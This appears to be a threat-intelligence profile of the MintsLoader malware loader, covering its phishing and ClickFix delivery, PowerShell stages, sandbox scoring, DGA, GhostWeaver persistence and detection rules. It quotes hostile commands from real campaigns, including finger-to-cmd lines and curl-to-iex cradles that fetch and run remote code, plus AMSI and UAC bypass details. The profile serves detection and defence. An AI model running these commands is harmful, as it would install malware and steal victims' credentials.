MintsLoader - ShroudCloud

# MintsLoader (TAG-124 / LandUpdate808 / UNC4108) **Type:** Malware Loader - PowerShell-based, multi-stage delivery platform **Also tracked as:** TAG-124 (Recorded Future), LandUpdate808 (Proofpoint), UNC4108 **First observed:** February 2023 (Orange Cyberdefense); widespread campaigns from mid-2024 onward **Status:** Active. Two concurrent C2 clusters operational as of March 2026: 178.156.128.182 (v0.20, Hetzner) and 86.107.101.93 (v0.23, Redoubt Networks). 35 documented campaign IDs. 200+ DGA domains across four clusters spanning February 2024 through March 2026. --- ## Threat Overview Pure-function loader with no intrinsic capabilities beyond payload delivery. Operates a multi-stage JavaScript-to-PowerShell chain, uses a date-seeded DGA for C2 resolution, scores victim environments via WMI anti-sandbox checks, and delivers GhostWeaver (primary), StealC, or modified BOINC clients to real machines while feeding decoys to sandboxes. Campaigns target industrial, legal, and energy sectors in the US and Europe. SocGholish operators were early adopters; TAG-124/LandUpdate808 is the primary sustained operator. MintsLoader occupies the same niche as GootLoader, Bumblebee, and Latrodectus - a loader-for-hire that bridges initial access to post-exploitation tooling. The bidirectional relationship with GhostWeaver (GhostWeaver can redeploy MintsLoader via `sendPlugin`) suggests tight operational integration rather than a pure buyer-seller dynamic. | Field | Value | |---|---| | Subject | MintsLoader - multi-stage malware loader | | Severity | High | | Exploitation status | In-the-wild, active campaigns | | Affected scope | Industrial, legal, energy sectors; US and Europe; Windows endpoints | | First seen | 2023-02 (Orange Cyberdefense); broad campaigns 2024-07 onward | | Primary payload | GhostWeaver PowerShell RAT | | Secondary payloads | StealC infostealer, modified BOINC client | | Operator | TAG-124 / LandUpdate808 (primary); SocGholish/TA569 (early adopter) | --- ## Activity Standing Active and expanding. TAG-124 runs two concurrent C2 clusters (v0.20 and v0.23) with 35 documented campaign IDs, indicating sustained multi-wave operations. SocGholish adopted MintsLoader circa July 2024 as an alternative delivery chain, broadening its reach via drive-by compromise on top of TAG-124's phishing campaigns. Infrastructure has migrated from anonymous VPS providers (BLNWX AS) to bulletproof hosters: Stark Industries Solutions (AS44477), GWY IT Pty Ltd (AS199959), SCALAXY-AS (AS58061, operated by 3NT Solutions/IROKO Networks/Inferno Solutions) - indicating operator investment in resilience. Linked earlier infrastructure (`amatua[.]org`, 2022; `happychristmas[.]click`) suggests operator activity predating the MintsLoader branding. --- ## Delivery Method **Primary: Phishing emails (TAG-124)** Spam emails target electricity, oil/gas, and legal services sectors. Two attachment types: 1. **JScript attachment:** Filename pattern `Fattura[0-9]{8}.js` (Italian invoice lures distributed via PEC certified email). After a 13-second sleep, WScript.Shell spawns PowerShell via curl to fetch stage 1. 2. **ClickFix/Kongtuke link:** Email contains a link to a fake "Click to verify" page. The page instructs the victim to copy and paste a command into the Windows Run dialog. The pasted command executes `finger.exe` or PowerShell to download MintsLoader. **Secondary: Drive-by compromise (SocGholish/TA569)** SocGholish operators inject fake browser update overlays on compromised websites. Visitors clicking the "update" download MintsLoader instead of a legitimate browser update. Adopted circa July 2024 as an alternative to SocGholish's native payload chain. **ClickFix observed commands:** - `cmd /c "finger gcaptcha@humver[.]top|cmd"` - `cmd /c "finger cloudflare@cfcheckver[.]top|cmd"` - `cmd /c "finger [email protected][.]108|cmd"` These abuse `finger.exe` - a legitimate Microsoft-signed binary from the obsolete Finger protocol. It remains on modern Windows, is rarely monitored, and can make outbound network connections. The piped output goes directly to `cmd` for execution. --- ## Delivers To | Payload | Type | Notes | |---|---|---| | **GhostWeaver** | PowerShell RAT | Primary payload across all campaigns. Port 25658, TLS 1.0, self-signed cert (CN=GeoTrust LTD.), pinned. Mutex `euzizvuze`. Plugin system via reflective .NET loading. Can redeploy MintsLoader. Four persistence modes (plaintext, DPAPI, DPAPI+hardcoded, ECHO). UAC bypass via CMSTPLUA COM. Scheduled task: `conhost --headless powershell -ep bypass Azure{FunctionName}` every 3 min. Registry marker: `HKCU:\Software\Microsoft\ExpirienceHost`. Hardcoded DNS resolvers bypass corporate filtering. | | **StealC** | Infostealer | MaaS by developer "Plymouth." Targets browser creds, extensions, crypto wallets, email, financial tokens. Downloads sqlite3.dll/nss3.dll dependencies. HTTP POST exfil. XOR-encrypted strings. Exits if username = "JohnDoe." | | **Modified BOINC** | Cryptomining/compute theft | Modified Berkeley Open Infrastructure client connecting to attacker-controlled project servers. Linked domains: `rosettahome[.]top`, `rosettahome[.]cn` (fake Rosetta@home pages). | | **Decoy payload** | Sandbox deflection | AsyncRAT downloaded from `temp[.]sh`, served to high-scoring (VM/sandbox) environments. | --- ## Infection Chain ### Step 1 - Delivery: JScript Dropper / ClickFix Page T1566.001, T1566.002, T1189, T1218 | TAG-124, SocGholish/TA569 Phishing email delivers heavily obfuscated JScript file (`Fattura[0-9]{8}.js`) or links to ClickFix/Kongtuke fake update page. JScript has three observed variants: cleartext PowerShell with hardcoded C2, character-replaced obfuscation rebuilding the download cradle, and Base64-encoded variant creating temporary PS1 files in `C:\Users\Public\Documents\` with random names. ClickFix pages instruct victim to paste `finger.exe` commands piping output to `cmd`. SocGholish injects fake browser update overlays on compromised sites. All paths converge on: `curl -useb http://[domain]/1.php?s=[campaign_ID]`. JScript self-deletes after execution. > **Detection Opportunity:** Monitor for user-launched JScript files (.js) spawning PowerShell or cmd child processes from Explorer or email client contexts. For drive-by delivery, watch for browser processes spawning script interpreters. The `finger.exe` LOLBin abuse is a significant detection gap in most environments - any `finger.exe` process making outbound network connections or piping output to `cmd`/`powershell` is almost certainly malicious on modern networks. ### Step 2 - Execution: PowerShell Stager (MintsLoader Core) T1059.001, T1562.001, T1027, T1140 | MintsLoader HTTP response returns Base64-encoded, XOR-decoded payload. Once decoded and decompressed, heavily obfuscated PowerShell bypasses AMSI (`amsiInitFailed` on `System.Management.Automation.AmsiUtils` set to `$true`), runs environment scoring (Step 3), executes DGA to generate C2 domains, and calls back with score and system info. Callback URL: `http://{DGA_domain}/{random}htr{random}.php?id={COMPUTERNAME}&key={SCORE}&s={CAMPAIGN_ID}`. Obfuscation uses arithmetic character encoding - every string constructed via math expressions without `[char]` casts: `@((8306-8191),(7691-7583),...) -join ''`. Analysis across five decoded samples: 840-886 encoded strings per build, helper class names randomized per compilation, decoded artifact sizes 32K-103K, unique 15-character mixed-case encryption key per build. Newer variant (Blackpoint Cyber, 2025) uses hashtable-based decoding: maps three-character tokens to individual bytes, processes encoded strings in fixed chunks, loads Base64-encoded Gzip-compressed .NET assemblies via reflection. > **Detection Opportunity:** PowerShell executing heavily obfuscated payloads with hidden windows, `Invoke-Expression` calls on remote content, and payload reconstruction patterns are strong signals. Watch for AMSI bypass attempts - any PowerShell process referencing `amsiInitFailed`, `AmsiUtils`, or `amsiContext` in command-line arguments or script blocks is a high-fidelity indicator. > > See rule: [[edr-win-def-defender-tampering]] ### Step 3 - Evasion: WMI Environment Scoring T1497.001 | MintsLoader Three WMI checks produce a cumulative score determining whether C2 serves real payload or decoy. Check 1: `Get-MpComputerStatus` for `IsVirtualMachine` (real: ~6.7B increment, VM: ~52.1B+). Check 2: `Win32_VideoController` `AdapterDACType` - "Internal"/"Integrated RAMDAC" = physical (0), "VMware"/"Bochs"/"SeaBIOS" = virtual (+8.8B to +74.9B). Check 3: `Win32_CacheMemory` `Purpose` - 4+ cache levels = real (0), 3 or fewer = emulated (+32.3B). Real machine total: ~7.2B. Triage sandbox VM: ~160B (22x higher). Additional checks (eSentire): exits if single core, <1111 MB RAM, vertical resolution <666px, or CIS language (Russia, Ukraine, Belarus, Kazakhstan, Uzbekistan). > **Detection Opportunity:** Watch for PowerShell processes issuing WMI queries against `Win32_VideoController`, `Win32_CacheMemory`, and `IsVirtualMachine` in rapid succession. This combination of GPU adapter type, CPU cache depth, and VM status queries from a single PowerShell process is highly anomalous and strongly indicative of automated sandbox detection. ### Step 4 - C2 Resolution: Domain Generation Algorithm T1568.002 | MintsLoader, GhostWeaver Four distinct DGA algorithms across kill chain stages. DGA1 (MintsLoader delivery): `System.Random` seeded with day-of-month + hardcoded constant, generates 10 candidate 15-character domains from lowercase alphanumeric charset, `.top` TLD, daily rotation. Iterates domains attempting HTTP GET to `1.php?s=<GUID>`, pipes response to `iex`, breaks on first valid payload. DGA2 (GhostWeaver C2): seed formula `[int](DayOfYear / 7 + 1 + Year * 854374)` for v0.20, `* 348374` for v0.23, weekly rotation, multiple TLDs. DGA3 (TDS launcher): `(DayOfYear+3)/7` formula, `.top`, weekly. DGA4 (Scoring callback): `a-n` charset, per-deployment seed. All use .NET `System.Random` (subtractive generator, Knuth's algorithm). All DGA domains registered through NICENIC with Hurricane Electric nameservers. Consistent registrant fingerprint: name hash `1f8f4166599d23ee`. > **Detection Opportunity:** Network-level detection is primary here. Monitor for rapid iteration of DNS queries to `.top` domains with 15-character alphanumeric labels, especially from PowerShell processes. The NICENIC registrar and Hurricane Electric nameserver combination is a useful enrichment pivot. On the endpoint, watch for PowerShell command lines containing `.top` TLD references combined with `iex`/`Invoke-Expression` or `1.php` URI patterns. ### Step 5 - Payload Delivery: Score-Gated Drop T1105 | MintsLoader C2 C2 evaluates `key` parameter (environment score). Real machines (score ~7.2B) receive GhostWeaver, StealC, or BOINC. Sandboxes/VMs (score ~160B) receive decoy executables (AsyncRAT from `temp[.]sh`). StealC exits if username = "JohnDoe" (common sandbox default). > **Detection Opportunity:** Monitor for PowerShell-based remote script retrieval, particularly `curl -useb` download cradles piped to `Invoke-Expression`. The callback URL pattern (`1.php?s=`, `htr.php?id=`) is useful for network-level signature development. ### Step 6 - Persistence: GhostWeaver Installation T1053.005, T1112, T1548.002, T1055, T1620 | GhostWeaver GhostWeaver installs via four persistence modes: (1) plaintext `.log` file with obfuscated `Get-Content` + `Invoke-Expression`, (2) DPAPI-encrypted payload with DGA4 callback for custom decryption stub, (3) DPAPI-encrypted with hardcoded decryption stub + `.jpg` trampoline, (4) ECHO - DPAPI-encrypted with clipboard-chain decryption. Scheduled task: `conhost --headless powershell -ep bypass Azure{FunctionName}` every 3 minutes. Payload location: `%LOCALAPPDATA%\Microsoft\{subfolder}\{FunctionName}.log`. Registry marker: `HKCU:\Software\Microsoft\ExpirienceHost` = 1 (intentional misspelling). UAC bypass via CMSTPLUA COM object - PEB masquerade via `VirtualProtectEx`/`WriteProcessMemory` to impersonate `explorer.exe`, then COM elevation via `CoGetObject("Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}")`. Disables Task Scheduler operational logs (`IsEnabled=False`). C2: port 25658, TLS 1.0 only, self-signed X.509 cert (CN=GeoTrust LTD., RSA 4096, SHA-512, valid 2023-12-04 to 9999-12-31), cert SHA256 `aa9bc093018e55b23fbb4d9548c4140a3f59162a216ba2df6c82691533dcb435`, client-side cert pinning, SNI set to IP. Plugins loaded reflectively via `Assembly.Load` (no disk), obfuscated with Confuser.Core 1.6. Known plugins: formgrabber, browser credential theft (Brave/Chrome/Firefox/Edge), Outlook extraction, crypto wallet theft. Hardcoded DNS resolvers: `216.218.130.2`, `74.82.42.42`, `208.67.222.222`, `76.76.2.5`, `1.1.1.1`. > **Detection Opportunities:** > - **Scheduled task abuse:** Watch for scheduled tasks executing `conhost --headless` spawning PowerShell with `-ep bypass`. Legitimate `conhost.exe` usage does not include the `--headless` flag with a PowerShell child process - this is a high-fidelity behavioral indicator. > - **Registry persistence marker:** Monitor for creation or modification of registry values under `HKCU:\Software\Microsoft\ExpirienceHost` (note the intentional misspelling of "Experience"). > - **UAC bypass via CMSTPLUA COM:** Detect `CoGetObject` calls referencing CLSID `{A6BFEA43-501F-456F-A845-983D3AD7B8F0}` or monitor for processes performing PEB masquerade (writing to their own PEB via `VirtualProtectEx`/`WriteProcessMemory` to impersonate explorer.exe before COM elevation). > - **TLS certificate fingerprint:** Port 25658/tcp, TLS 1.0, cert SHA256 `aa9bc093018e55b23fbb4d9548c4140a3f59162a216ba2df6c82691533dcb435`. Network-level detection only. > - **Mutex:** `euzizvuze` - requires memory or handle telemetry. --- ## Raw Command Lines Observed operator commands from IR reports and malware analysis. `[R]` = reconstructed from described behavior. **ClickFix delivery** ``` cmd /c "finger gcaptcha@humver[.]top|cmd" cmd /c "finger cloudflare@cfcheckver[.]top|cmd" cmd /c "finger [email protected][.]108|cmd" ``` **JScript download cradle (all variants)** ``` curl -useb http://[domain]/1.php?s=[campaign_ID] ``` **Deobfuscated stager (Blumira sample)** ``` $updgzrfsqcnht = 'ur' Set-Alias mitresa c$($updgzrfsqcnht)l iex (curl -useb http://windowsliveupdater[.]com/spo.ps1) ``` **Payload staging** ``` curl -s -L -o C:\Users\admin\AppData\Local\[randomized].pdf midpils.com/ujn.jpg tar -xf C:\Users\admin\AppData\Local\[randomized].pdf -C [target_directory] powershell -Command "Invoke-CimMethod -ClassName Win32_Process..." [R] ``` **GhostWeaver persistence (scheduled task)** ``` conhost --headless powershell -ep bypass Azure{FunctionName} [R] ``` **GhostWeaver UAC bypass** ``` CoGetObject("Elevation:Administrator!new:{A6BFEA43-501F-456F-A845-983D3AD7B8F0}") [R] ``` --- ## Detection Opportunities Summary The following behavioral indicators are actionable across any endpoint detection platform. Ordered by fidelity. | Behavior | Fidelity | What to Look For | |---|---|---| | `finger.exe` outbound + pipe to cmd/powershell | HIGH | Any `finger.exe` process making network connections or with command line containing `\|cmd` or `\|powershell`. Near-zero legitimate use on modern networks. | | `conhost --headless` spawning PowerShell | HIGH | Parent process `conhost.exe` with `--headless` flag creating PowerShell child with `-ep bypass`. Not observed in legitimate use. | | AMSI bypass strings in PowerShell | HIGH | PowerShell script blocks or command lines containing `amsiInitFailed`, `AmsiUtils`, or `amsiContext`. | | Registry key `ExpirienceHost` | HIGH | Creation or modification of `HKCU:\Software\Microsoft\ExpirienceHost`. Intentional misspelling makes this a precise indicator. | | WMI sandbox scoring battery | MEDIUM | PowerShell querying `Win32_VideoController`, `Win32_CacheMemory`, and `IsVirtualMachine` in a single session. | | `curl -useb` piped to `iex` | MEDIUM | PowerShell download cradle pattern. Common across multiple loaders but reliable when combined with other chain indicators. | | Rapid .top domain DNS iteration | MEDIUM | DNS queries to multiple 15-character `.top` domains in rapid succession from a single endpoint. Network-level. | | Port 25658 TLS 1.0 with self-signed cert | MEDIUM | Outbound connection to port 25658 using TLS 1.0 with CN=GeoTrust LTD. Network-level. | | JScript/WScript spawning PowerShell | LOW-MEDIUM | `wscript.exe` or `cscript.exe` creating `powershell.exe`/`pwsh.exe` child. Legitimate use exists but uncommon. | --- ## Intelligence Gaps - **Monetization chain unclear** - GhostWeaver provides persistent access, but the downstream buyer (ransomware operator, data broker) is not publicly documented. If TAG-124 sells access like TA569, mapping the buyer-seller relationship changes the severity assessment. - **BOINC purpose ambiguous** - Modified BOINC client connects to attacker infrastructure, but whether this is cryptomining, distributed computing for password cracking, or something else is not confirmed in public reporting. - **GhostWeaver plugin inventory incomplete** - Only formgrabber, browser stealer, Outlook, and crypto wallet plugins are documented. The `sendPlugin` architecture suggests additional modules exist. - **DGA prediction tools absent** - No public DGA prediction/generation script exists for proactive domain blocking, despite the algorithm being well-documented. Orange Cyberdefense's GitHub repo has IOCs and YARA but not a DGA generator. - **AsyncRAT ecosystem overlap unresolved** - Early GhostWeaver samples were misclassified as AsyncRAT (Palo Alto Unit42). The degree to which shared certificate generation practices indicate operational overlap vs. coincidence is unresolved. --- ## Confidence Assessment | Claim | Confidence | Evidence | Flips if... | |---|---|---|---| | TAG-124 is primary MintsLoader operator | HIGH | Recorded Future Insikt Group campaign tracking, consistent campaign IDs | Discovery of independent operator using same tooling | | GhostWeaver is primary payload | HIGH | Recorded Future, derp.ca, multiple campaign observations | Shift to different primary payload in future campaigns | | SocGholish adopted MintsLoader mid-2024 | HIGH | Orange Cyberdefense timeline, Recorded Future | Earlier samples surfacing | | DGA uses day-of-month seed (DGA1) | HIGH | eSentire, Recorded Future, Blackpoint code analysis | Algorithm update in newer variants | | Environment scoring determines payload delivery | HIGH | Recorded Future code analysis, sandbox vs real scoring | C2 logic change | | Industrial/legal/energy sector targeting | MEDIUM | eSentire, Recorded Future sector observations | Broadening to other verticals | | Bulletproof hosting migration for resilience | MEDIUM | Recorded Future infrastructure analysis | Return to anonymous VPS | --- ## ATT&CK Mapping | Technique | ID | Chain Phase | |---|---|---| | Phishing: Spearphishing Attachment | T1566.001 | Delivery | | Phishing: Spearphishing Link | T1566.002 | Delivery | | Drive-by Compromise | T1189 | Delivery (SocGholish) | | System Binary Proxy Execution | T1218 | Delivery (finger.exe LOLBin) | | Command and Scripting Interpreter: PowerShell | T1059.001 | Execution | | Impair Defenses: Disable or Modify Tools | T1562.001 | Defense Evasion (AMSI bypass) | | Obfuscated Files or Information | T1027 | Defense Evasion | | Deobfuscate/Decode Files or Information | T1140 | Defense Evasion | | Virtualization/Sandbox Evasion: System Checks | T1497.001 | Defense Evasion | | Dynamic Resolution: Domain Generation Algorithms | T1568.002 | C2 | | Ingress Tool Transfer | T1105 | Payload delivery | | Scheduled Task/Job: Scheduled Task | T1053.005 | Persistence | | Modify Registry | T1112 | Persistence | | Abuse Elevation Control Mechanism: Bypass UAC | T1548.002 | Privilege Escalation | | Process Injection | T1055 | Defense Evasion | | Reflective Code Loading | T1620 | Execution | --- ## Detections Sigma rules applicable to this threat: | Rule ID | Description | |---|---| | [[edr-win-def-defender-tampering]] | Windows Defender Tampering via PowerShell | | [[edr-win-c2-reverse-tunneling]] | Reverse Tunnel Tool Execution | --- ## Key Publications 1. [Recorded Future Insikt Group - Uncovering MintsLoader With Recorded Future Malware Intelligence Hunting](https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting) (2025-04-29) 2. [Recorded Future Insikt Group - Full PDF Report (CTA-2025-0429)](https://assets.recordedfuture.com/insikt-report-pdfs/2025/cta-2025-0429.pdf) (2025-04-29) 3. [eSentire TRU - MintsLoader: StealC and BOINC Delivery](https://www.esentire.com/blog/mintsloader-stealc-and-boinc-delivery) (2025-01) 4. [derp.ca - GhostWeaver: A Malware That Lives Up to Its Name](https://www.derp.ca/research/ghostweaver-tag124-powershell-rat/) (2026-03) 5. [Blackpoint Cyber - New MintsLoader Variant Using Hashtable Obfuscation](https://blackpointcyber.com/blog/mintsloader-finger-protocol-hashtable-obfuscation/) (2025) 6. [Blumira - How MintsLoader Uses a Legacy Windows Binary to Gain a Foothold](https://www.blumira.com/blog/how-mintsloader-uses-a-legacy-windows-binary-to-gain-a-foothold) (2025) 7. [cert-orangecyberdefense/mintsloader - GitHub IOC Repository](https://github.com/cert-orangecyberdefense/mintsloader) (ongoing) 8. [eSentire IOCs - MintsLoader/StealC January 2025](https://github.com/eSentire/iocs/blob/main/MintsLoader/MintsLoader_Stealc_01_14_2025.txt) 9. [SANS ISC - KongTuke Activity](https://isc.sans.edu/diary/KongTuke%20activity/32498) (2025) 10. [MITRE ATT&CK - T1568.002 Domain Generation Algorithms](https://attack.mitre.org/techniques/T1568/002/)